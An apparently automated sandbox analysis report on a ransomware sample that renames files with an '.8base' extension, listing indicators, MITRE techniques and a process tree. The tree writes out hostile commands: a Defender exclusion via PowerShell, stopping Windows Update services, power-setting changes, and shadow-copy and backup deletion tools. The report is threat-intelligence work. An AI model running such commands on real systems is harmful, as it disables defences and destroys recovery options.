File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1	_cG.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\hu_get.svg	_cG.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-pl.xrm-ms	_cG.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\file_info.png.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEEXCL.DLL	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\nc_60x42.png	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-30_contrast-white.png	_cG.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\it-IT\TipTsf.dll.mui	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\No Symbol_icon.png	_cG.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\BRANDING.XML.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\WorldClockMedTile.scale-200.png	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\69_24x24x32.png	_cG.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar	_cG.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\PowerPointCapabilities.json	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreSmallTile.scale-100.png	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeLargeTile.scale-200_contrast-black.png	_cG.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\es-ES\wab32res.dll.mui	_cG.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ul-oob.xrm-ms.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Fues\green_button.png	_cG.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small2x.png	_cG.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\IMCONTACT.DLL	_cG.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\ui-strings.js	_cG.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2504 sc.exe
3356 sc.exe
1492 sc.exe
4656 sc.exe
4840 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

4332 592 WerFault.exe
4264 992 WerFault.exe

pid	process
2504	sc.exe
3356	sc.exe
1492	sc.exe
4656	sc.exe
4840	sc.exe

pid	pid_target	process	target process
4332	592	WerFault.exe
4264	992	WerFault.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\BE8A.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\BE8A.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\BE8A.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\BE8A.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 7 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

y853e.exevds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	y853e.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	y853e.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	y853e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

certreq.exe

description	ioc	process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	certreq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	certreq.exe

Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

4680 vssadmin.exe
3192 vssadmin.exe

pid	process
4680	vssadmin.exe
3192	vssadmin.exe

Modifies registry class 3 IoCs

Processes:

smss.exe_cG.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings	_cG.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.execertreq.exe_cG.exey853e.exey853e.exe_cG.exeExplorer.EXE_cG.exe

pid	process
4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
2504	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
2504	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
2504	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
2504	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
1872	certreq.exe
1872	certreq.exe
1872	certreq.exe
1872	certreq.exe
1224	_cG.exe
1232	y853e.exe
5024	y853e.exe
5024	y853e.exe
5052	_cG.exe
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
4468	_cG.exe
4468	_cG.exe
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
4468	_cG.exe
4468	_cG.exe
3184	Explorer.EXE
3184	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

smss.exe

pid process

3184 smss.exe

pid	process
3184	smss.exe

Suspicious behavior: LoadsDriver 64 IoCs

Processes:

pid	process
2536
2716
2876
2800
1668
1976
2056
4732
168
2756
2924
4352
1384
2968
2108
4700
2896
3332
3696
3420
3744
3364
3896
3380
3428
3740
4772
3460
5076
284
4512
764
4392
1072
1224
2400
2708
4080
532
4128
1052
1800
4744
2144
4836
4956
620
972
716
4424
268
3944
4824
4876
4380
96
2504
4896
384
280
3816
4368
924
4976

Suspicious behavior: MapViewOfSection 33 IoCs

Processes:

y853e.exeExplorer.EXEsmss.exesmss.exe

pid	process
5024	y853e.exe
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	Explorer.EXE
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3968	smss.exe
3968	smss.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe_cG.exey853e.exe_cG.exe_cG.exevssvc.exeWMIC.exeExplorer.EXEwbengine.exeACF4.exeB283.exesmss.exe

description	pid	process
Token: SeDebugPrivilege	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
Token: SeDebugPrivilege	1224	_cG.exe
Token: SeDebugPrivilege	1232	y853e.exe
Token: SeDebugPrivilege	5052	_cG.exe
Token: SeDebugPrivilege	4468	_cG.exe
Token: SeBackupPrivilege	2576	vssvc.exe
Token: SeRestorePrivilege	2576	vssvc.exe
Token: SeAuditPrivilege	2576	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2108	WMIC.exe
Token: SeSecurityPrivilege	2108	WMIC.exe
Token: SeTakeOwnershipPrivilege	2108	WMIC.exe
Token: SeLoadDriverPrivilege	2108	WMIC.exe
Token: SeSystemProfilePrivilege	2108	WMIC.exe
Token: SeSystemtimePrivilege	2108	WMIC.exe
Token: SeProfSingleProcessPrivilege	2108	WMIC.exe
Token: SeIncBasePriorityPrivilege	2108	WMIC.exe
Token: SeCreatePagefilePrivilege	2108	WMIC.exe
Token: SeBackupPrivilege	2108	WMIC.exe
Token: SeRestorePrivilege	2108	WMIC.exe
Token: SeShutdownPrivilege	2108	WMIC.exe
Token: SeDebugPrivilege	2108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2108	WMIC.exe
Token: SeRemoteShutdownPrivilege	2108	WMIC.exe
Token: SeUndockPrivilege	2108	WMIC.exe
Token: SeManageVolumePrivilege	2108	WMIC.exe
Token: 33	2108	WMIC.exe
Token: 34	2108	WMIC.exe
Token: 35	2108	WMIC.exe
Token: 36	2108	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2108	WMIC.exe
Token: SeSecurityPrivilege	2108	WMIC.exe
Token: SeTakeOwnershipPrivilege	2108	WMIC.exe
Token: SeLoadDriverPrivilege	2108	WMIC.exe
Token: SeSystemProfilePrivilege	2108	WMIC.exe
Token: SeSystemtimePrivilege	2108	WMIC.exe
Token: SeProfSingleProcessPrivilege	2108	WMIC.exe
Token: SeIncBasePriorityPrivilege	2108	WMIC.exe
Token: SeCreatePagefilePrivilege	2108	WMIC.exe
Token: SeBackupPrivilege	2108	WMIC.exe
Token: SeRestorePrivilege	2108	WMIC.exe
Token: SeShutdownPrivilege	2108	WMIC.exe
Token: SeDebugPrivilege	2108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2108	WMIC.exe
Token: SeRemoteShutdownPrivilege	2108	WMIC.exe
Token: SeUndockPrivilege	2108	WMIC.exe
Token: SeManageVolumePrivilege	2108	WMIC.exe
Token: 33	2108	WMIC.exe
Token: 34	2108	WMIC.exe
Token: 35	2108	WMIC.exe
Token: 36	2108	WMIC.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeBackupPrivilege	1152	wbengine.exe
Token: SeRestorePrivilege	1152	wbengine.exe
Token: SeSecurityPrivilege	1152	wbengine.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeDebugPrivilege	3356	ACF4.exe
Token: SeDebugPrivilege	4812	B283.exe
Token: SeShutdownPrivilege	3184	smss.exe
Token: SeCreatePagefilePrivilege	3184	smss.exe
Token: SeShutdownPrivilege	3184	smss.exe
Token: SeCreatePagefilePrivilege	3184	smss.exe
Token: SeShutdownPrivilege	3184	smss.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

smss.exesmss.exe

pid process

3184 smss.exe
3184 smss.exe
3184 smss.exe
3184 smss.exe
3184 smss.exe
3184 smss.exe
1908 smss.exe
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

smss.exe

pid process

3184 smss.exe
3184 smss.exe
3184 smss.exe
3184 smss.exe

pid	process
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe
1908	smss.exe

pid	process
3184	smss.exe
3184	smss.exe
3184	smss.exe
3184	smss.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe_cG.exey853e.exe_cG.exe_cG.execmd.execmd.exeExplorer.EXEACF4.exe

description	pid	process	target process
PID 4104 wrote to memory of 2504	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
PID 4104 wrote to memory of 2504	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
PID 4104 wrote to memory of 2504	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
PID 4104 wrote to memory of 2504	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
PID 4104 wrote to memory of 2504	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
PID 4104 wrote to memory of 2504	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
PID 4104 wrote to memory of 2504	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
PID 4104 wrote to memory of 2504	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
PID 2504 wrote to memory of 1872	2504	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	certreq.exe
PID 2504 wrote to memory of 1872	2504	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	certreq.exe
PID 2504 wrote to memory of 1872	2504	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	certreq.exe
PID 2504 wrote to memory of 1872	2504	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	certreq.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1224 wrote to memory of 4468	1224	_cG.exe	_cG.exe
PID 1232 wrote to memory of 5024	1232	y853e.exe	y853e.exe
PID 1232 wrote to memory of 5024	1232	y853e.exe	y853e.exe
PID 1232 wrote to memory of 5024	1232	y853e.exe	y853e.exe
PID 1232 wrote to memory of 5024	1232	y853e.exe	y853e.exe
PID 1232 wrote to memory of 5024	1232	y853e.exe	y853e.exe
PID 1232 wrote to memory of 5024	1232	y853e.exe	y853e.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 5052 wrote to memory of 3796	5052	_cG.exe	_cG.exe
PID 4468 wrote to memory of 5032	4468	_cG.exe	cmd.exe
PID 4468 wrote to memory of 5032	4468	_cG.exe	cmd.exe
PID 4468 wrote to memory of 3172	4468	_cG.exe	cmd.exe
PID 4468 wrote to memory of 3172	4468	_cG.exe	cmd.exe
PID 5032 wrote to memory of 4680	5032	cmd.exe	vssadmin.exe
PID 5032 wrote to memory of 4680	5032	cmd.exe	vssadmin.exe
PID 3172 wrote to memory of 808	3172	cmd.exe	netsh.exe
PID 3172 wrote to memory of 808	3172	cmd.exe	netsh.exe
PID 5032 wrote to memory of 2108	5032	cmd.exe	WMIC.exe
PID 5032 wrote to memory of 2108	5032	cmd.exe	WMIC.exe
PID 3172 wrote to memory of 1412	3172	cmd.exe	netsh.exe
PID 3172 wrote to memory of 1412	3172	cmd.exe	netsh.exe
PID 5032 wrote to memory of 3512	5032	cmd.exe	bcdedit.exe
PID 5032 wrote to memory of 3512	5032	cmd.exe	bcdedit.exe
PID 5032 wrote to memory of 3560	5032	cmd.exe	bcdedit.exe
PID 5032 wrote to memory of 3560	5032	cmd.exe	bcdedit.exe
PID 5032 wrote to memory of 4632	5032	cmd.exe	wbadmin.exe
PID 5032 wrote to memory of 4632	5032	cmd.exe	wbadmin.exe
PID 3184 wrote to memory of 3356	3184	Explorer.EXE	ACF4.exe
PID 3184 wrote to memory of 3356	3184	Explorer.EXE	ACF4.exe
PID 3184 wrote to memory of 3356	3184	Explorer.EXE	ACF4.exe
PID 3356 wrote to memory of 4512	3356	ACF4.exe	ACF4.exe
PID 3356 wrote to memory of 4512	3356	ACF4.exe	ACF4.exe
PID 3356 wrote to memory of 4512	3356	ACF4.exe	ACF4.exe
PID 3356 wrote to memory of 1740	3356	ACF4.exe	ACF4.exe
PID 3356 wrote to memory of 1740	3356	ACF4.exe	ACF4.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1200

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2420

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3184

C:\Users\Admin\AppData\Local\Temp\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
"C:\Users\Admin\AppData\Local\Temp\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4104

C:\Users\Admin\AppData\Local\Temp\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
C:\Users\Admin\AppData\Local\Temp\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
2⤵
- Deletes itself
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1872

C:\Users\Admin\AppData\Local\Temp\ACF4.exe
C:\Users\Admin\AppData\Local\Temp\ACF4.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3356

C:\Users\Admin\AppData\Local\Temp\ACF4.exe
C:\Users\Admin\AppData\Local\Temp\ACF4.exe
3⤵
- Executes dropped EXE
PID:4512

C:\Users\Admin\AppData\Local\Temp\ACF4.exe
C:\Users\Admin\AppData\Local\Temp\ACF4.exe
3⤵
- Executes dropped EXE
PID:1740

C:\Users\Admin\AppData\Local\Temp\B283.exe
C:\Users\Admin\AppData\Local\Temp\B283.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Users\Admin\AppData\Local\Temp\B283.exe
"C:\Users\Admin\AppData\Local\Temp\B283.exe"
3⤵
- Executes dropped EXE
PID:1740

C:\Users\Admin\AppData\Local\Temp\BE8A.exe
C:\Users\Admin\AppData\Local\Temp\BE8A.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316

C:\Users\Admin\AppData\Local\Temp\E9B2.exe
C:\Users\Admin\AppData\Local\Temp\E9B2.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:4288

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3792

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:1476

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:4816

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:1116

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:1712

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:700

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:3336

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:4220

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:4432

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:808

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:216

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:272

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:3928

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:3000

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exe -debug
3⤵
PID:1908

C:\Windows\SysWOW64\ctfmon.exe
ctfmon.exe
4⤵
PID:1160

C:\Windows\SysWOW64\ctfmon.exe
ctfmon.exe
4⤵
PID:4716

C:\Windows\SYSTEM32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\aa_nts.dll",run
4⤵
PID:2864

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:3780

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4656

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4840

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2504

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3356

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1492

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4000

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:1428

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:3552

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:2952

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:544

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:1044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
